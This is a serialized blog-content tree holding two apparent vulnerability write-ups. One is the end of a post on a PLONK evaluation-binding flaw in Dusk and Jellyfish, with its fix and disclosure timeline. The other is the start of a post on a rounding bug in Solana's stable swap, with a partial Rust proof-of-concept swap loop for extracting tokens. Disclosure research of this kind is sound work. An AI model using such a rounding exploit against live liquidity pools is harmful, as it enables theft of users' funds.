",{"type":26,"tag":130,"props":5152,"children":5154},{"className":5153},[133,134],[5155],{"type":26,"tag":137,"props":5156,"children":5158},{"className":5157},[140],[5159],{"type":26,"tag":137,"props":5160,"children":5162},{"className":5161,"ariaHidden":146},[145],[5163],{"type":26,"tag":137,"props":5164,"children":5166},{"className":5165},[151],[5167,5171],{"type":26,"tag":137,"props":5168,"children":5170},{"className":5169,"style":1542},[156],[],{"type":26,"tag":137,"props":5172,"children":5174},{"className":5173,"style":190},[169,170],[5175],{"type":32,"value":5148},{"type":32,"value":5177},", so the prover can adjust them after the fact to make the check pass.",{"type":26,"tag":35,"props":5179,"children":5180},{},[5181,5183,5189,5191,5197],{"type":32,"value":5182},"The attack requires modifying a single evaluation (",{"type":26,"tag":130,"props":5184,"children":5186},{"className":5185},[],[5187],{"type":32,"value":5188},"key_table_next_eval",{"type":32,"value":5190},") by ",{"type":26,"tag":130,"props":5192,"children":5194},{"className":5193},[],[5195],{"type":32,"value":5196},"delta / (u * v^3)",{"type":32,"value":5198}," to close the gap between the true and expected batched evaluation, which, like the Dusk exploit, reduces to a single field division.",{"type":26,"tag":35,"props":5200,"children":5201},{},[5202,5204,5211,5213,5224],{"type":32,"value":5203},"To our knowledge, Jellyfish's UltraPlonk mode is not currently deployed in production. ",{"type":26,"tag":41,"props":5205,"children":5208},{"href":5206,"rel":5207},"https://github.com/EspressoSystems/jellyfish/pull/867",[45],[5209],{"type":32,"value":5210},"PR #867",{"type":32,"value":5212}," fixed the issue and was tagged as ",{"type":26,"tag":41,"props":5214,"children":5217},{"href":5215,"rel":5216},"https://github.com/EspressoSystems/jellyfish/tree/jf-plonk-v0.8.0",[45],[5218],{"type":26,"tag":130,"props":5219,"children":5221},{"className":5220},[],[5222],{"type":32,"value":5223},"jf-plonk-v0.8.0",{"type":32,"value":5225}," on March 18, 2026.",{"type":26,"tag":3265,"props":5227,"children":5228},{},[],{"type":26,"tag":92,"props":5230,"children":5232},{"id":5231},"toward-standardization",[5233],{"type":32,"value":5234},"Toward standardization",{"type":26,"tag":35,"props":5236,"children":5237},{},[5238,5240,5247],{"type":32,"value":5239},"The fact that two independent PLONK implementations contain the same class of bug, and that ",{"type":26,"tag":41,"props":5241,"children":5244},{"href":5242,"rel":5243},"https://osec.io/blog/2026-03-03-zkvms-unfaithful-claims/",[45],[5245],{"type":32,"value":5246},"similar patterns appear across zkVMs",{"type":32,"value":5248},", suggests this isn't a problem that individual audits alone can solve. The check described above (diff \"evaluations used\" against \"evaluations bound\") is mechanical and could be built into development tooling, CI pipelines, or standardized PLONK verification specifications.",{"type":26,"tag":35,"props":5250,"children":5251},{},[5252],{"type":32,"value":5253},"We're in early discussions with the Dusk team and other stakeholders about what a PLONK standardization effort could look like: a curve-agnostic, backend-agnostic specification of the verification protocol that makes invariants like evaluation binding explicit and checkable.",{"type":26,"tag":35,"props":5255,"children":5256},{},[5257],{"type":32,"value":5258},"The status quo, where each team implements their own PLONK variant from the paper and hopes the auditor catches what they missed, is fragile. A shared, well-reviewed verification spec would reduce the surface area for these bugs and give auditors a concrete checklist to verify against.",{"type":26,"tag":92,"props":5260,"children":5262},{"id":5261},"disclosure-timeline",[5263],{"type":32,"value":5264},"Disclosure timeline",{"type":26,"tag":3584,"props":5266,"children":5267},{},[5268,5284],{"type":26,"tag":3588,"props":5269,"children":5270},{},[5271],{"type":26,"tag":3592,"props":5272,"children":5273},{},[5274,5279],{"type":26,"tag":3596,"props":5275,"children":5276},{},[5277],{"type":32,"value":5278},"Date",{"type":26,"tag":3596,"props":5280,"children":5281},{},[5282],{"type":32,"value":5283},"Event",{"type":26,"tag":3607,"props":5285,"children":5286},{},[5287,5300,5313,5325,5351,5371],{"type":26,"tag":3592,"props":5288,"children":5289},{},[5290,5295],{"type":26,"tag":3614,"props":5291,"children":5292},{},[5293],{"type":32,"value":5294},"2026-02-13",{"type":26,"tag":3614,"props":5296,"children":5297},{},[5298],{"type":32,"value":5299},"Dusk vulnerability reported",{"type":26,"tag":3592,"props":5301,"children":5302},{},[5303,5308],{"type":26,"tag":3614,"props":5304,"children":5305},{},[5306],{"type":32,"value":5307},"2026-02-14",{"type":26,"tag":3614,"props":5309,"children":5310},{},[5311],{"type":32,"value":5312},"Dusk acknowledged",{"type":26,"tag":3592,"props":5314,"children":5315},{},[5316,5320],{"type":26,"tag":3614,"props":5317,"children":5318},{},[5319],{"type":32,"value":5307},{"type":26,"tag":3614,"props":5321,"children":5322},{},[5323],{"type":32,"value":5324},"Dusk fix committed",{"type":26,"tag":3592,"props":5326,"children":5327},{},[5328,5333],{"type":26,"tag":3614,"props":5329,"children":5330},{},[5331],{"type":32,"value":5332},"2026-02-27",{"type":26,"tag":3614,"props":5334,"children":5335},{},[5336,5338,5349],{"type":32,"value":5337},"Public ",{"type":26,"tag":41,"props":5339,"children":5342},{"href":5340,"rel":5341},"https://github.com/dusk-network/rusk/releases/tag/dusk-rusk-1.6.0",[45],[5343],{"type":26,"tag":130,"props":5344,"children":5346},{"className":5345},[],[5347],{"type":32,"value":5348},"dusk-rusk-1.6.0",{"type":32,"value":5350}," release published",{"type":26,"tag":3592,"props":5352,"children":5353},{},[5354,5359],{"type":26,"tag":3614,"props":5355,"children":5356},{},[5357],{"type":32,"value":5358},"2026-03-16",{"type":26,"tag":3614,"props":5360,"children":5361},{},[5362,5364,5370],{"type":32,"value":5363},"Jellyfish fix PR opened (",{"type":26,"tag":41,"props":5365,"children":5367},{"href":5206,"rel":5366},[45],[5368],{"type":32,"value":5369},"#867",{"type":32,"value":200},{"type":26,"tag":3592,"props":5372,"children":5373},{},[5374,5379],{"type":26,"tag":3614,"props":5375,"children":5376},{},[5377],{"type":32,"value":5378},"2026-03-18",{"type":26,"tag":3614,"props":5380,"children":5381},{},[5382,5384,5389,5391],{"type":32,"value":5383},"Jellyfish fix merged in ",{"type":26,"tag":41,"props":5385,"children":5387},{"href":5206,"rel":5386},[45],[5388],{"type":32,"value":5369},{"type":32,"value":5390}," and tagged as ",{"type":26,"tag":41,"props":5392,"children":5394},{"href":5215,"rel":5393},[45],[5395],{"type":26,"tag":130,"props":5396,"children":5398},{"className":5397},[],[5399],{"type":32,"value":5223},{"type":26,"tag":92,"props":5401,"children":5403},{"id":5402},"acknowledgements",[5404],{"type":32,"value":5405},"Acknowledgements",{"type":26,"tag":35,"props":5407,"children":5408},{},[5409],{"type":32,"value":5410},"We thank the Dusk team for responding within a day, coordinating the fix transparently, and engaging on the broader standardization question. We also thank the Espresso Systems team for turning around the Jellyfish patch in under a week.",{"title":7,"searchDepth":5412,"depth":5412,"links":5413},2,[5414,5422,5423,5424,5425,5426,5427,5428,5429,5430,5431,5432],{"id":94,"depth":5412,"text":97,"children":5415},[5416,5418,5419,5420,5421],{"id":120,"depth":5417,"text":123},3,{"id":996,"depth":5417,"text":999},{"id":2217,"depth":5417,"text":2220},{"id":2247,"depth":5417,"text":2250},{"id":2531,"depth":5417,"text":2534},{"id":3270,"depth":5412,"text":3273},{"id":3410,"depth":5412,"text":3413},{"id":4058,"depth":5412,"text":4061},{"id":4664,"depth":5412,"text":4667},{"id":4801,"depth":5412,"text":4804},{"id":4917,"depth":5412,"text":4920},{"id":5010,"depth":5412,"text":5013},{"id":5078,"depth":5412,"text":5081},{"id":5231,"depth":5412,"text":5234},{"id":5261,"depth":5412,"text":5264},{"id":5402,"depth":5412,"text":5405},"markdown","content:blog:2026-04-30-unverified-evaluations-dusk-plonk.md","content","blog/2026-04-30-unverified-evaluations-dusk-plonk.md","blog/2026-04-30-unverified-evaluations-dusk-plonk","md",[5440,7963,8300,11848,16207,21338,31596,33027,33790,38017,43044,48476,49633,53123,63514,70242,72081,73790,78455,92353,95073,99843,102282,104627,110412,126204,134540,144462],{"_path":5441,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":5442,"description":5443,"image":5444,"date":5448,"isFeatured":18,"tags":5449,"onBlogPage":18,"body":5452,"_type":5433,"_id":7960,"_source":5435,"_file":7961,"_stem":7962,"_extension":5438},"/blog/2022-04-26-spl-swap-rounding","Becoming a Millionaire, 0.000150 BTC at a Time","How we discovered a critical issue in Solana's stable swap implementation. A story about arbitrage and rounding.",{"src":5445,"width":5446,"height":5447},"/posts/spl-swap/title.jpg",600,368,"2022-04-26",[5450,5451],"solana","report",{"type":23,"children":5453,"toc":7954},[5454,5468,5473,5478,5486,5492,5497,5502,5511,5520,5525,5530,5538,5543,5548,5946,5956,5961,6508,6513,6521,6528,6534,6539,6544,6549,6556,6568,6573,6585,6793,6798,6803,6809,6814,6819,6866,6871,6879,6884,6889,6894,7038,7051,7168,7182,7190,7204,7212,7225,7230,7242,7250,7272,7890,7896,7901,7913,7926,7933,7938,7943,7948],{"type":26,"tag":35,"props":5455,"children":5456},{},[5457,5459,5466],{"type":32,"value":5458},"We discovered a critical rounding issue in the Solana Program Library's implementation of stable swap, ",{"type":26,"tag":41,"props":5460,"children":5463},{"href":5461,"rel":5462},"https://github.com/solana-labs/solana-program-library/tree/master/token-swap/program",[45],[5464],{"type":32,"value":5465},"spl-token-swap",{"type":32,"value":5467},". Similar to Neodyme's spl-token-lending exploit, we were able to extract a single token per instruction. This exceeds the value of the 5000 lamport transaction fee on BTC stable swaps, allowing an attacker to profitably drain funds.",{"type":26,"tag":35,"props":5469,"children":5470},{},[5471],{"type":32,"value":5472},"Such BTC stable swaps had over 74 million in combined value. The total value of stable swaps impacted exceed 700 million.",{"type":26,"tag":35,"props":5474,"children":5475},{},[5476],{"type":32,"value":5477},"We would also like to thank the Saber team for their fast triage and remediation.",{"type":26,"tag":35,"props":5479,"children":5480},{},[5481],{"type":26,"tag":762,"props":5482,"children":5483},{},[5484],{"type":32,"value":5485},"Rounding bugs are an increasingly common vulnerability class, enabled by low transaction costs",{"type":26,"tag":92,"props":5487,"children":5489},{"id":5488},"discovery",[5490],{"type":32,"value":5491},"Discovery",{"type":26,"tag":35,"props":5493,"children":5494},{},[5495],{"type":32,"value":5496},"Parth, one of our researchers, was implementing a graph search for our arbitrage bot to calculate the price of any token relative to SOL.",{"type":26,"tag":35,"props":5498,"children":5499},{},[5500],{"type":32,"value":5501},"After a while, he noticed something weird..",{"type":26,"tag":5503,"props":5504,"children":5505},"blockquote",{},[5506],{"type":26,"tag":35,"props":5507,"children":5508},{},[5509],{"type":32,"value":5510},"so either my graph search is wrong\nor its possible to get a ton of money out of nothing",{"type":26,"tag":5512,"props":5513,"children":5515},"pre",{"code":5514},"KwnjUuZ :              0 9vMJfxu ->              1 EPjFWdd\nKwnjUuZ :              1 EPjFWdd ->              2 9vMJfxu\nKwnjUuZ :              2 9vMJfxu ->              3 EPjFWdd\nHU1tejU :              3 EPjFWdd ->            625 PRT88Rk\n24ZbKS3 :            625 PRT88Rk ->              7 EPjFWdd\n3oRPcFa :              7 EPjFWdd ->              6 BQcdHdA\n",[5516],{"type":26,"tag":130,"props":5517,"children":5518},{"__ignoreMap":7},[5519],{"type":32,"value":5514},{"type":26,"tag":35,"props":5521,"children":5522},{},[5523],{"type":32,"value":5524},"Somehow, we were getting tokens from nothing?",{"type":26,"tag":35,"props":5526,"children":5527},{},[5528],{"type":32,"value":5529},"After taking a look at the pairs on which this was occuring, we quickly realized that only stable swap pairs were impacted.",{"type":26,"tag":5512,"props":5531,"children":5533},{"code":5532},"KwnjUuZhTMTSGAaavkLEmSyfobY16JNH4poL9oeeEvE\nHU1tejUtt7AZYrC9SAuqCW9MpuSqsdoedHSb1XUKjUPN\n24ZbKS36rkPv14Tdx8qv4NRyqatTaJ5KgJrT1LxBKn5d\n3oRPcFaRHvv9pPR6nRasigVDkm3k9kTjdfjxUpgLV5Pq\n",[5534],{"type":26,"tag":130,"props":5535,"children":5536},{"__ignoreMap":7},[5537],{"type":32,"value":5532},{"type":26,"tag":35,"props":5539,"children":5540},{},[5541],{"type":32,"value":5542},"This seemed suspicious. Perhaps it had something to do with the stable swap math?",{"type":26,"tag":35,"props":5544,"children":5545},{},[5546],{"type":32,"value":5547},"It was also weird how we could only ever get at most one extra token. As usual, the best way to answer such questions is to read the code. We dived into the stable swap Solana implementation to look for a possible root cause.",{"type":26,"tag":5512,"props":5549,"children":5553},{"code":5550,"language":5551,"meta":7,"className":5552,"style":7},"    // Solve for y by approximating: y**2 + b*y = c\n    let mut y = d_val;\n    for _ in 0..ITERATIONS {\n        let (y_new, _) = (checked_u8_power(&y, 2)?.checked_add(c)?)\n            .checked_ceil_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n        if y_new == y {\n            break;\n        } else {\n            y = y_new;\n        }\n    }\n","rust","language-rust shiki shiki-themes slack-dark",[5554],{"type":26,"tag":130,"props":5555,"children":5556},{"__ignoreMap":7},[5557,5568,5605,5640,5743,5848,5876,5889,5907,5928,5937],{"type":26,"tag":137,"props":5558,"children":5561},{"class":5559,"line":5560},"line",1,[5562],{"type":26,"tag":137,"props":5563,"children":5565},{"style":5564},"--shiki-default:#6A9955",[5566],{"type":32,"value":5567},"    // Solve for y by approximating: y**2 + b*y = c\n",{"type":26,"tag":137,"props":5569,"children":5570},{"class":5559,"line":5412},[5571,5577,5582,5588,5594,5599],{"type":26,"tag":137,"props":5572,"children":5574},{"style":5573},"--shiki-default:#569CD6",[5575],{"type":32,"value":5576},"    let",{"type":26,"tag":137,"props":5578,"children":5579},{"style":5573},[5580],{"type":32,"value":5581}," mut",{"type":26,"tag":137,"props":5583,"children":5585},{"style":5584},"--shiki-default:#9CDCFE",[5586],{"type":32,"value":5587}," y",{"type":26,"tag":137,"props":5589,"children":5591},{"style":5590},"--shiki-default:#D4D4D4",[5592],{"type":32,"value":5593}," =",{"type":26,"tag":137,"props":5595,"children":5596},{"style":5584},[5597],{"type":32,"value":5598}," d_val",{"type":26,"tag":137,"props":5600,"children":5602},{"style":5601},"--shiki-default:#E6E6E6",[5603],{"type":32,"value":5604},";\n",{"type":26,"tag":137,"props":5606,"children":5607},{"class":5559,"line":5417},[5608,5614,5619,5624,5630,5635],{"type":26,"tag":137,"props":5609,"children":5611},{"style":5610},"--shiki-default:#C586C0",[5612],{"type":32,"value":5613},"    for",{"type":26,"tag":137,"props":5615,"children":5616},{"style":5584},[5617],{"type":32,"value":5618}," _",{"type":26,"tag":137,"props":5620,"children":5621},{"style":5573},[5622],{"type":32,"value":5623}," in",{"type":26,"tag":137,"props":5625,"children":5627},{"style":5626},"--shiki-default:#B5CEA8",[5628],{"type":32,"value":5629}," 0",{"type":26,"tag":137,"props":5631,"children":5632},{"style":5590},[5633],{"type":32,"value":5634},"..",{"type":26,"tag":137,"props":5636,"children":5637},{"style":5601},[5638],{"type":32,"value":5639},"ITERATIONS {\n",{"type":26,"tag":137,"props":5641,"children":5643},{"class":5559,"line":5642},4,[5644,5649,5653,5658,5662,5667,5672,5676,5680,5686,5690,5695,5699,5703,5707,5711,5716,5721,5725,5729,5733,5738],{"type":26,"tag":137,"props":5645,"children":5646},{"style":5573},[5647],{"type":32,"value":5648},"        let",{"type":26,"tag":137,"props":5650,"children":5651},{"style":5601},[5652],{"type":32,"value":4625},{"type":26,"tag":137,"props":5654,"children":5655},{"style":5584},[5656],{"type":32,"value":5657},"y_new",{"type":26,"tag":137,"props":5659,"children":5660},{"style":5601},[5661],{"type":32,"value":1108},{"type":26,"tag":137,"props":5663,"children":5664},{"style":5584},[5665],{"type":32,"value":5666},"_",{"type":26,"tag":137,"props":5668,"children":5669},{"style":5601},[5670],{"type":32,"value":5671},") ",{"type":26,"tag":137,"props":5673,"children":5674},{"style":5590},[5675],{"type":32,"value":289},{"type":26,"tag":137,"props":5677,"children":5678},{"style":5601},[5679],{"type":32,"value":4625},{"type":26,"tag":137,"props":5681,"children":5683},{"style":5682},"--shiki-default:#DCDCAA",[5684],{"type":32,"value":5685},"checked_u8_power",{"type":26,"tag":137,"props":5687,"children":5688},{"style":5601},[5689],{"type":32,"value":165},{"type":26,"tag":137,"props":5691,"children":5692},{"style":5590},[5693],{"type":32,"value":5694},"&",{"type":26,"tag":137,"props":5696,"children":5697},{"style":5584},[5698],{"type":32,"value":193},{"type":26,"tag":137,"props":5700,"children":5701},{"style":5601},[5702],{"type":32,"value":1108},{"type":26,"tag":137,"props":5704,"children":5705},{"style":5626},[5706],{"type":32,"value":277},{"type":26,"tag":137,"props":5708,"children":5709},{"style":5601},[5710],{"type":32,"value":200},{"type":26,"tag":137,"props":5712,"children":5713},{"style":5590},[5714],{"type":32,"value":5715},"?.",{"type":26,"tag":137,"props":5717,"children":5718},{"style":5682},[5719],{"type":32,"value":5720},"checked_add",{"type":26,"tag":137,"props":5722,"children":5723},{"style":5601},[5724],{"type":32,"value":165},{"type":26,"tag":137,"props":5726,"children":5727},{"style":5584},[5728],{"type":32,"value":4326},{"type":26,"tag":137,"props":5730,"children":5731},{"style":5601},[5732],{"type":32,"value":200},{"type":26,"tag":137,"props":5734,"children":5735},{"style":5590},[5736],{"type":32,"value":5737},"?",{"type":26,"tag":137,"props":5739,"children":5740},{"style":5601},[5741],{"type":32,"value":5742},")\n",{"type":26,"tag":137,"props":5744,"children":5746},{"class":5559,"line":5745},5,[5747,5752,5757,5761,5766,5770,5774,5778,5782,5786,5790,5794,5798,5802,5806,5810,5814,5819,5823,5828,5832,5836,5840,5844],{"type":26,"tag":137,"props":5748,"children":5749},{"style":5590},[5750],{"type":32,"value":5751},"            .",{"type":26,"tag":137,"props":5753,"children":5754},{"style":5682},[5755],{"type":32,"value":5756},"checked_ceil_div",{"type":26,"tag":137,"props":5758,"children":5759},{"style":5601},[5760],{"type":32,"value":165},{"type":26,"tag":137,"props":5762,"children":5763},{"style":5682},[5764],{"type":32,"value":5765},"checked_u8_mul",{"type":26,"tag":137,"props":5767,"children":5768},{"style":5601},[5769],{"type":32,"value":165},{"type":26,"tag":137,"props":5771,"children":5772},{"style":5590},[5773],{"type":32,"value":5694},{"type":26,"tag":137,"props":5775,"children":5776},{"style":5584},[5777],{"type":32,"value":193},{"type":26,"tag":137,"props":5779,"children":5780},{"style":5601},[5781],{"type":32,"value":1108},{"type":26,"tag":137,"props":5783,"children":5784},{"style":5626},[5785],{"type":32,"value":277},{"type":26,"tag":137,"props":5787,"children":5788},{"style":5601},[5789],{"type":32,"value":200},{"type":26,"tag":137,"props":5791,"children":5792},{"style":5590},[5793],{"type":32,"value":5715},{"type":26,"tag":137,"props":5795,"children":5796},{"style":5682},[5797],{"type":32,"value":5720},{"type":26,"tag":137,"props":5799,"children":5800},{"style":5601},[5801],{"type":32,"value":165},{"type":26,"tag":137,"props":5803,"children":5804},{"style":5584},[5805],{"type":32,"value":2832},{"type":26,"tag":137,"props":5807,"children":5808},{"style":5601},[5809],{"type":32,"value":200},{"type":26,"tag":137,"props":5811,"children":5812},{"style":5590},[5813],{"type":32,"value":5715},{"type":26,"tag":137,"props":5815,"children":5816},{"style":5682},[5817],{"type":32,"value":5818},"checked_sub",{"type":26,"tag":137,"props":5820,"children":5821},{"style":5601},[5822],{"type":32,"value":165},{"type":26,"tag":137,"props":5824,"children":5825},{"style":5584},[5826],{"type":32,"value":5827},"d_val",{"type":26,"tag":137,"props":5829,"children":5830},{"style":5601},[5831],{"type":32,"value":200},{"type":26,"tag":137,"props":5833,"children":5834},{"style":5590},[5835],{"type":32,"value":5737},{"type":26,"tag":137,"props":5837,"children":5838},{"style":5601},[5839],{"type":32,"value":200},{"type":26,"tag":137,"props":5841,"children":5842},{"style":5590},[5843],{"type":32,"value":5737},{"type":26,"tag":137,"props":5845,"children":5846},{"style":5601},[5847],{"type":32,"value":5604},{"type":26,"tag":137,"props":5849,"children":5851},{"class":5559,"line":5850},6,[5852,5857,5862,5867,5871],{"type":26,"tag":137,"props":5853,"children":5854},{"style":5610},[5855],{"type":32,"value":5856},"        if",{"type":26,"tag":137,"props":5858,"children":5859},{"style":5584},[5860],{"type":32,"value":5861}," y_new",{"type":26,"tag":137,"props":5863,"children":5864},{"style":5590},[5865],{"type":32,"value":5866}," ==",{"type":26,"tag":137,"props":5868,"children":5869},{"style":5584},[5870],{"type":32,"value":5587},{"type":26,"tag":137,"props":5872,"children":5873},{"style":5601},[5874],{"type":32,"value":5875}," {\n",{"type":26,"tag":137,"props":5877,"children":5879},{"class":5559,"line":5878},7,[5880,5885],{"type":26,"tag":137,"props":5881,"children":5882},{"style":5610},[5883],{"type":32,"value":5884},"            break",{"type":26,"tag":137,"props":5886,"children":5887},{"style":5601},[5888],{"type":32,"value":5604},{"type":26,"tag":137,"props":5890,"children":5892},{"class":5559,"line":5891},8,[5893,5898,5903],{"type":26,"tag":137,"props":5894,"children":5895},{"style":5601},[5896],{"type":32,"value":5897},"        } ",{"type":26,"tag":137,"props":5899,"children":5900},{"style":5610},[5901],{"type":32,"value":5902},"else",{"type":26,"tag":137,"props":5904,"children":5905},{"style":5601},[5906],{"type":32,"value":5875},{"type":26,"tag":137,"props":5908,"children":5910},{"class":5559,"line":5909},9,[5911,5916,5920,5924],{"type":26,"tag":137,"props":5912,"children":5913},{"style":5584},[5914],{"type":32,"value":5915},"            y",{"type":26,"tag":137,"props":5917,"children":5918},{"style":5590},[5919],{"type":32,"value":5593},{"type":26,"tag":137,"props":5921,"children":5922},{"style":5584},[5923],{"type":32,"value":5861},{"type":26,"tag":137,"props":5925,"children":5926},{"style":5601},[5927],{"type":32,"value":5604},{"type":26,"tag":137,"props":5929,"children":5931},{"class":5559,"line":5930},10,[5932],{"type":26,"tag":137,"props":5933,"children":5934},{"style":5601},[5935],{"type":32,"value":5936},"        }\n",{"type":26,"tag":137,"props":5938,"children":5940},{"class":5559,"line":5939},11,[5941],{"type":26,"tag":137,"props":5942,"children":5943},{"style":5601},[5944],{"type":32,"value":5945},"    }\n",{"type":26,"tag":35,"props":5947,"children":5948},{},[5949,5954],{"type":26,"tag":762,"props":5950,"children":5951},{},[5952],{"type":32,"value":5953},"approximate",{"type":32,"value":5955},". Looks suspicious.. Perhaps we really did find a bug in the Solana Program Library?",{"type":26,"tag":35,"props":5957,"children":5958},{},[5959],{"type":32,"value":5960},"With this promising find in mind, we decided to throw together a quick proof of concept. To do this, we attempted to swap very small amounts of tokens back and forth between sBTC and renBTC.",{"type":26,"tag":5512,"props":5962,"children":5964},{"code":5963,"language":5551,"meta":7,"className":5552,"style":7},"// from sbtc to renbtc\nfor i in 0 .. 50u8 {\n    // create swap transaction\n    let mut swap_instruction = swap(\n        &spl_token::id(),\n        &swap_pubkey,\n        &swap_authority_pubkey,\n        &test_account_signer.pubkey(),\n        &sbtc_user_account,\n        &sbtc_reserve,\n        &renbtc_reserve,\n        &renbtc_user_account,\n        &admin_fee_account_sbtc_to_ren,\n        1,\n        2\n    ).unwrap();\n\n    // nonce\n    swap_instruction.data.append(&mut vec![i, extranonce]);\n\n    let mut instructions = vec![];\n\n    instructions.push(swap_instruction);\n\n    env.execute_as_transaction(&instructions, &vec![&test_account_signer]);\n}\n",[5965],{"type":26,"tag":130,"props":5966,"children":5967},{"__ignoreMap":7},[5968,5976,6017,6025,6055,6083,6100,6116,6141,6157,6173,6189,6206,6223,6236,6245,6268,6277,6286,6353,6361,6391,6399,6431,6439,6499],{"type":26,"tag":137,"props":5969,"children":5970},{"class":5559,"line":5560},[5971],{"type":26,"tag":137,"props":5972,"children":5973},{"style":5564},[5974],{"type":32,"value":5975},"// from sbtc to renbtc\n",{"type":26,"tag":137,"props":5977,"children":5978},{"class":5559,"line":5412},[5979,5984,5989,5993,5997,6002,6007,6013],{"type":26,"tag":137,"props":5980,"children":5981},{"style":5610},[5982],{"type":32,"value":5983},"for",{"type":26,"tag":137,"props":5985,"children":5986},{"style":5584},[5987],{"type":32,"value":5988}," i",{"type":26,"tag":137,"props":5990,"children":5991},{"style":5573},[5992],{"type":32,"value":5623},{"type":26,"tag":137,"props":5994,"children":5995},{"style":5626},[5996],{"type":32,"value":5629},{"type":26,"tag":137,"props":5998,"children":5999},{"style":5590},[6000],{"type":32,"value":6001}," ..",{"type":26,"tag":137,"props":6003,"children":6004},{"style":5626},[6005],{"type":32,"value":6006}," 50",{"type":26,"tag":137,"props":6008,"children":6010},{"style":6009},"--shiki-default:#4EC9B0",[6011],{"type":32,"value":6012},"u8",{"type":26,"tag":137,"props":6014,"children":6015},{"style":5601},[6016],{"type":32,"value":5875},{"type":26,"tag":137,"props":6018,"children":6019},{"class":5559,"line":5417},[6020],{"type":26,"tag":137,"props":6021,"children":6022},{"style":5564},[6023],{"type":32,"value":6024},"    // create swap transaction\n",{"type":26,"tag":137,"props":6026,"children":6027},{"class":5559,"line":5642},[6028,6032,6036,6041,6045,6050],{"type":26,"tag":137,"props":6029,"children":6030},{"style":5573},[6031],{"type":32,"value":5576},{"type":26,"tag":137,"props":6033,"children":6034},{"style":5573},[6035],{"type":32,"value":5581},{"type":26,"tag":137,"props":6037,"children":6038},{"style":5584},[6039],{"type":32,"value":6040}," swap_instruction",{"type":26,"tag":137,"props":6042,"children":6043},{"style":5590},[6044],{"type":32,"value":5593},{"type":26,"tag":137,"props":6046,"children":6047},{"style":5682},[6048],{"type":32,"value":6049}," swap",{"type":26,"tag":137,"props":6051,"children":6052},{"style":5601},[6053],{"type":32,"value":6054},"(\n",{"type":26,"tag":137,"props":6056,"children":6057},{"class":5559,"line":5745},[6058,6063,6068,6073,6078],{"type":26,"tag":137,"props":6059,"children":6060},{"style":5590},[6061],{"type":32,"value":6062},"        &",{"type":26,"tag":137,"props":6064,"children":6065},{"style":5601},[6066],{"type":32,"value":6067},"spl_token",{"type":26,"tag":137,"props":6069,"children":6070},{"style":5590},[6071],{"type":32,"value":6072},"::",{"type":26,"tag":137,"props":6074,"children":6075},{"style":5682},[6076],{"type":32,"value":6077},"id",{"type":26,"tag":137,"props":6079,"children":6080},{"style":5601},[6081],{"type":32,"value":6082},"(),\n",{"type":26,"tag":137,"props":6084,"children":6085},{"class":5559,"line":5850},[6086,6090,6095],{"type":26,"tag":137,"props":6087,"children":6088},{"style":5590},[6089],{"type":32,"value":6062},{"type":26,"tag":137,"props":6091,"children":6092},{"style":5584},[6093],{"type":32,"value":6094},"swap_pubkey",{"type":26,"tag":137,"props":6096,"children":6097},{"style":5601},[6098],{"type":32,"value":6099},",\n",{"type":26,"tag":137,"props":6101,"children":6102},{"class":5559,"line":5878},[6103,6107,6112],{"type":26,"tag":137,"props":6104,"children":6105},{"style":5590},[6106],{"type":32,"value":6062},{"type":26,"tag":137,"props":6108,"children":6109},{"style":5584},[6110],{"type":32,"value":6111},"swap_authority_pubkey",{"type":26,"tag":137,"props":6113,"children":6114},{"style":5601},[6115],{"type":32,"value":6099},{"type":26,"tag":137,"props":6117,"children":6118},{"class":5559,"line":5891},[6119,6123,6128,6132,6137],{"type":26,"tag":137,"props":6120,"children":6121},{"style":5590},[6122],{"type":32,"value":6062},{"type":26,"tag":137,"props":6124,"children":6125},{"style":5584},[6126],{"type":32,"value":6127},"test_account_signer",{"type":26,"tag":137,"props":6129,"children":6130},{"style":5590},[6131],{"type":32,"value":470},{"type":26,"tag":137,"props":6133,"children":6134},{"style":5682},[6135],{"type":32,"value":6136},"pubkey",{"type":26,"tag":137,"props":6138,"children":6139},{"style":5601},[6140],{"type":32,"value":6082},{"type":26,"tag":137,"props":6142,"children":6143},{"class":5559,"line":5909},[6144,6148,6153],{"type":26,"tag":137,"props":6145,"children":6146},{"style":5590},[6147],{"type":32,"value":6062},{"type":26,"tag":137,"props":6149,"children":6150},{"style":5584},[6151],{"type":32,"value":6152},"sbtc_user_account",{"type":26,"tag":137,"props":6154,"children":6155},{"style":5601},[6156],{"type":32,"value":6099},{"type":26,"tag":137,"props":6158,"children":6159},{"class":5559,"line":5930},[6160,6164,6169],{"type":26,"tag":137,"props":6161,"children":6162},{"style":5590},[6163],{"type":32,"value":6062},{"type":26,"tag":137,"props":6165,"children":6166},{"style":5584},[6167],{"type":32,"value":6168},"sbtc_reserve",{"type":26,"tag":137,"props":6170,"children":6171},{"style":5601},[6172],{"type":32,"value":6099},{"type":26,"tag":137,"props":6174,"children":6175},{"class":5559,"line":5939},[6176,6180,6185],{"type":26,"tag":137,"props":6177,"children":6178},{"style":5590},[6179],{"type":32,"value":6062},{"type":26,"tag":137,"props":6181,"children":6182},{"style":5584},[6183],{"type":32,"value":6184},"renbtc_reserve",{"type":26,"tag":137,"props":6186,"children":6187},{"style":5601},[6188],{"type":32,"value":6099},{"type":26,"tag":137,"props":6190,"children":6192},{"class":5559,"line":6191},12,[6193,6197,6202],{"type":26,"tag":137,"props":6194,"children":6195},{"style":5590},[6196],{"type":32,"value":6062},{"type":26,"tag":137,"props":6198,"children":6199},{"style":5584},[6200],{"type":32,"value":6201},"renbtc_user_account",{"type":26,"tag":137,"props":6203,"children":6204},{"style":5601},[6205],{"type":32,"value":6099},{"type":26,"tag":137,"props":6207,"children":6209},{"class":5559,"line":6208},13,[6210,6214,6219],{"type":26,"tag":137,"props":6211,"children":6212},{"style":5590},[6213],{"type":32,"value":6062},{"type":26,"tag":137,"props":6215,"children":6216},{"style":5584},[6217],{"type":32,"value":6218},"admin_fee_account_sbtc_to_ren",{"type":26,"tag":137,"props":6220,"children":6221},{"style":5601},[6222],{"type":32,"value":6099},{"type":26,"tag":137,"props":6224,"children":6226},{"class":5559,"line":6225},14,[6227,6232],{"type":26,"tag":137,"props":6228,"children":6229},{"style":5626},[6230],{"type":32,"value":6231},"        1",{"type":26,"tag":137,"props":6233,"children":6234},{"style":5601},[6235],{"type":32,"value":6099},{"type":26,"tag":137,"props":6237,"children":6239},{"class":5559,"line":6238},15,[6240],{"type":26,"tag":137,"props":6241,"children":6242},{"style":5626},[6243],{"type":32,"value":6244},"        